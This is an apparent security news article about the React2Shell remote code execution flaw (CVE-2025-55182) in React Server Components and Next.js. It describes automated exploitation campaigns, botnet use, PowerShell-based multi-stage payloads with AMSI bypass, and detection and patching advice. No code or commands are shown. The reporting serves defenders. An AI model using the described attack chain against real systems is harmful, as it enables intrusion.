A critical security threat is emerging, with a remote code execution vulnerability, named React2Shell, being actively exploited in the wild. This issue, identified as CVE-2025-55182, poses a significant risk to React and its related ecosystems, including Next.js.
GreyNoise researchers have uncovered a widespread exploitation campaign, primarily automated, targeting a dangerous deserialization flaw in the React Server Components Flight protocol. This vulnerability allows attackers to execute malicious code remotely without authentication, a severe concern for affected systems.
But here's where it gets controversial: the attack pattern reveals a strategic approach. Hackers are leveraging both new and old systems, with automated traffic dominating the landscape. This suggests a sophisticated and well-organized campaign, as evidenced by the integration of the vulnerability into Mirai and other botnet kits.
The attack chain begins with initial access attempts using publicly available proof-of-concept code. Attackers then deploy multi-stage payloads, starting with PowerShell arithmetic operations to confirm remote code execution. Subsequent stages involve encoded PowerShell stagers, which employ obfuscation and bypass techniques to evade Windows security measures.
Traffic analysis uncovers a mix of user agents, including Go-http-client, Assetnote scanners, and popular browsers like Chrome and Safari. This composition is typical of early exploitation, often involving researchers, scanners, and spoofed browser activity.
The geographical distribution of the attack is concentrated in specific regions, with nearly half of the malicious IPs first appearing in December 2025. GreyNoise offers a proactive solution, allowing defenders to block these IPs using their React Server Components template.
To mitigate this threat, organizations must prioritize patching vulnerable React Server Components and Next.js deployments. Endpoint detection should target PowerShell processes with encoded commands and suspicious functions, along with script blocks bypassing Windows AMSI security. Monitoring for repeated PowerShell arithmetic operations can also serve as a crucial indicator of exploitation attempts.
Stay informed about the latest cybersecurity threats by following us on Google News, LinkedIn, and X. And remember, in the ever-evolving world of cyber threats, staying proactive is the best defense.
